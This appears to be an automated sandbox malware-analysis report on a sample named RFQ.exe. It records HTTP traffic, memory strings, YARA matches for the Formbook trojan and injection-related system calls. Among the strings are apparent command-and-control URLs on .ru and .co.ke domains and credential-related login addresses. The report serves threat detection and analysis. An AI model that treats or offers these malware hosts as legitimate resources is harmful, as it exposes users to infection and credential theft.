            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:43 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:45 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:48 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=7nERBm9qcGQS1BK4u13e; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:54 GMT Date: Tue, 16 Apr 2024 10:02:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=kegewplNQENTSIE1Q7qY; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:56 GMT Date: Tue, 16 Apr 2024 10:02:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=0uihN83ZkchmiEoJtwrf; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:59 GMT Date: Tue, 16 Apr 2024 10:02:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=FsLO3Xo3enk5xsnyCzPb; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:03:02 GMT Date: Tue, 16 Apr 2024 10:03:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Tue, 16 Apr 2024 10:03:19 GMT server: LiteSpeed vary: User-Agent
            Source: RFQ.exe, 00000000.00000002.2009924751.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: icacls.exe, 00000008.00000002.4432678458.00000000050E6000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003DE6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/
            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4433484681.00000000050AF000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.naglissere.ru
            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4433484681.00000000050AF000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.naglissere.ru/bnz5/
            Source: icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/
            Source: icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/?dn=
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003930000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://htmlcodex.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://htmlcodex.com/credit-removal
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: icacls.exe, 00000008.00000003.2333207064.000000000822F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara match File source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: RFQ.exe, DriversSelection.cs Large array initialization: : array initializer size 661782
            Source: 0.2.RFQ.exe.2c801f4.7.raw.unpack, SQL.cs Large array initialization: : array initializer size 13797
            Source: 0.2.RFQ.exe.73c0000.10.raw.unpack, SQL.cs Large array initialization: : array initializer size 13797
            Source: initial sample Static PE information: Filename: RFQ.exe
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_0042AA43 NtClose,5_2_0042AA43
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72B60 NtClose,LdrInitializeThunk,5_2_01A72B60
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01A72DF0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01A72C70
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A735C0 NtCreateMutant,LdrInitializeThunk,5_2_01A735C0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A74340 NtSetContextThread,5_2_01A74340
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A74650 NtSuspendThread,5_2_01A74650
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72BA0 NtEnumerateValueKey,5_2_01A72BA0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72B80 NtQueryInformationFile,5_2_01A72B80
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72BE0 NtQueryValueKey,5_2_01A72BE0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72BF0 NtAllocateVirtualMemory,5_2_01A72BF0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72AB0 NtWaitForSingleObject,5_2_01A72AB0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72AF0 NtWriteFile,5_2_01A72AF0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72AD0 NtReadFile,5_2_01A72AD0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72DB0 NtEnumerateKey,5_2_01A72DB0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72DD0 NtDelayExecution,5_2_01A72DD0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72D30 NtUnmapViewOfSection,5_2_01A72D30
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72D00 NtSetInformationFile,5_2_01A72D00
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72D10 NtMapViewOfSection,5_2_01A72D10
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72CA0 NtQueryInformationToken,5_2_01A72CA0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72CF0 NtOpenProcess,5_2_01A72CF0
